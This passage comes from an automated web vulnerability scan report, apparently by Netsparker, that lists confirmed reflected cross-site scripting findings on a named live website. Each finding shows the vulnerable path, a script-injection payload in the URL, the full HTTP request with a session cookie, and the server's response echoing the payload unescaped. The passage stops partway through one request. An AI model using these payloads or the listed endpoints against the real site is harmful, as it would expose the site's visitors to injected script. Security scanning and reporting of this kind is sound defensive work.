GET /about/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0004FA)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:03:54 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 170
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/about/reg/'"--></style></script><script>netsparker(0x0004FA)</script><BR>script><BR>style><<script>netsparker(0x0004FA)<.asp?id=script>
59 / 146
3.83. /js/getbanner.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003E5)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/js/getbanner.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00..
Parameters
Parameter Type Value
odiv GET 3
URI-BASED Full URL '"--></style></script>
<script>alert(0x0003E5)</script>
Request
GET /js/getbanner.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0003E5)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/js/func_site.js
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:00:33 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 176
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/js/getbanner.asp'"--></style></script><script>netsparker(0x0003E5)</script><BR>script><BR>style><<script>netsparker(0x0003E5)<.asp?id=script>
3.84. /site/bmidrash/list.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00033E)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/site/bmidrash/list.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealer..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x00033E)</script>
Request
GET /site/bmidrash/list.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00033E)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/sitemap.xml
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:58:46 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 182
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/site/bmidrash/list.asp'"--></style></script><script>netsparker(0x00033E)</script><BR>script><BR>style><<script>netsparker(0x00033E)<.asp?id=script>
60 / 146
3.85. /contact/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000138)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/contact/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000138)%3C..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x000138)</script>
Request
GET /contact/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000138)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:44:31 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 168
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/contact/'"--></style></script><script>netsparker(0x000138)</script><BR>script><BR>style><<script>netsparker(0x000138)<.asp?id=script>
3.86. /contact/search/default.asp CONFIRMED
http://www.shalomlaam.co.il/contact/search/default.asp?'"--></style></script><script>alert(0x0004D6)..
Parameters
Parameter Type Value
q GET 3
Query Based Query String '"--></style></script>
<script>alert(0x0004D6)</script>
Request
GET /contact/search/default.asp?'"--></style></script><script>netsparker(0x0004D6)</script> HTTP/1.1
Referer: http://www.shalomlaam.co.il/contact/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:03:35 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 187
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/contact/search/default.asp?'"--></style></script><script>netsparker(0x0004D6)</script><BR>script><BR>style><<script>netsparker(0x0004D6)<.asp?id=script>
61 / 146
3.87. /maillingUpdate.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000210)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x000210)</script>
Request
GET /maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000210)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:48:33 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 178
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/maillingUpdate.asp'"--></style></script><script>netsparker(0x000210)</script><BR>script><BR>style><<script>netsparker(0x000210)<.asp?id=script>
3.88. /js/top1.htm'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003C2)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/js/top1.htm'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003C2)..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0003C2)</script>
Request
GET /js/top1.htm'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0003C2)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/js/func_site.js
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:00:25 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 171
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/js/top1.htm'"--></style></script><script>netsparker(0x0003C2)</script><BR>script><BR>style><<script>netsparker(0x0003C2)<.asp?id=script>
62 / 146
3.89. /scripts/swfobject.js'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000FF)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/scripts/swfobject.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0000FF)</script>
Request
GET /scripts/swfobject.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000FF)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:44:08 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 180
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/scripts/swfobject.js'"--></style></script><script>netsparker(0x0000FF)</script><BR>script><BR>style><<script>netsparker(0x0000FF)<.asp?id=script>
3.90. /jAccordion/jquery.jAccordion-1.2.1.min.js'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000F9)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/jAccordion/jquery.jAccordion-1.2.1.min.js'%22--%3E%3C/style%3E%3C/script..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0000F9)</script>
Request
GET /jAccordion/jquery.jAccordion-1.2.1.min.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000F9)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:44:06 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 201
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/jAccordion/jquery.jAccordion-1.2.1.min.js'"--></style></script><script>netsparker(0x0000F9)</script><BR>script><BR>style><<script>netsparker(0x0000F9)
<.asp?id=script>
63 / 146
3.91. /about/reg/maillingUpdate.asp CONFIRMED
http://www.shalomlaam.co.il/about/reg/maillingUpdate.asp?'"--></style></script><script>alert(0x00052..
Parameters
Parameter Type Value
emailtonews POST netsparker@example.com
Query Based Query String '"--></style></script>
<script>alert(0x000526)</script>
Request
POST /about/reg/maillingUpdate.asp?'"--></style></script><script>netsparker(0x000526)</script> HTTP/1.1
Referer: http://www.shalomlaam.co.il/about/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Content-Length: 37
Accept-Encoding: gzip, deflate
emailtonews=netsparker%40example.com&
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:04:07 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 189
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/about/reg/maillingUpdate.asp?'"--></style></script><script>netsparker(0x000526)</script><BR>script><BR>style><<script>netsparker(0x000526)<.asp?
id=script>
3.92. /alon/musag.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000198)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/alon/musag.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x000198)</script>
Request
GET /alon/musag.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000198)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:47:01 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 174
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/alon/musag.asp'"--></style></script><script>netsparker(0x000198)</script><BR>script><BR>style><<script>netsparker(0x000198)<.asp?id=script>
64 / 146
3.93. /site/about/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00028E)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/site/about/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00028E)..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x00028E)</script>
Request
GET /site/about/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00028E)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 20 May 2014 13:56:06 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Encoding:
Vary: Accept-Encoding
Transfer-Encoding: chunked
404;http://www.shalomlaam.co.il:80/site/about/'"--></style></script><script>netsparker(0x00028E)</script><BR>script><BR>style><<script>netsparker(0x00028E)<.asp?id=script>
3.94. /site/l/agrala_tozaot.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002A5)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/site/l/agrala_tozaot.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0002A5)</script>
Request
GET /site/l/agrala_tozaot.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002A5)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/sitemap.xml
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:56:25 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 184
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/site/l/agrala_tozaot.asp'"--></style></script><script>netsparker(0x0002A5)</script><BR>script><BR>style><<script>netsparker(0x0002A5)<.asp?id=script>
65 / 146
3.95. /site/alon/list.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000131)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/site/alon/list.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x000131)</script>
Request
GET /site/alon/list.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:44:26 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 178
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/site/alon/list.asp'"--></style></script><script>netsparker(0x000131)</script><BR>script><BR>style><<script>netsparker(0x000131)<.asp?id=script>
3.96. /sipur/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001A0)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/sipur/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001A0)%3C/s..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0001A0)</script>
Request
GET /sipur/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001A0)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:47:07 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 166
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/sipur/'"--></style></script><script>netsparker(0x0001A0)</script><BR>script><BR>style><<script>netsparker(0x0001A0)<.asp?id=script>
66 / 146
3.97. /site/reg/reg.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000288)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/site/reg/reg.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x000288)</script>
Request
GET /site/reg/reg.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000288)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/sitemap.xml
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:56:03 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 176
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/site/reg/reg.asp'"--></style></script><script>netsparker(0x000288)</script><BR>script><BR>style><<script>netsparker(0x000288)<.asp?id=script>
3.98. /gallery/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00014F)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/gallery/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00014F)%3C..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x00014F)</script>
Request
GET /gallery/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00014F)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:44:49 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 168
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/gallery/'"--></style></script><script>netsparker(0x00014F)</script><BR>script><BR>style><<script>netsparker(0x00014F)<.asp?id=script>
3.99. /LIVE/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00019D)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/LIVE/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00019D)%3C/sc..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x00019D)</script>
67 / 146
Request
GET /LIVE/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00019D)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:47:04 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 165
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/LIVE/'"--></style></script><script>netsparker(0x00019D)</script><BR>script><BR>style><<script>netsparker(0x00019D)<.asp?id=script>
3.100. /site/pic/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00045E)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/site/pic/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00045E)%3..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x00045E)</script>
Request
GET /site/pic/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00045E)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:01:47 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 169
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/site/pic/'"--></style></script><script>netsparker(0x00045E)</script><BR>script><BR>style><<script>netsparker(0x00045E)<.asp?id=script>
3.101. /jAccordion/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000F2)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/jAccordion/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000F2)..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0000F2)</script>
Request
GET /jAccordion/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000F2)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
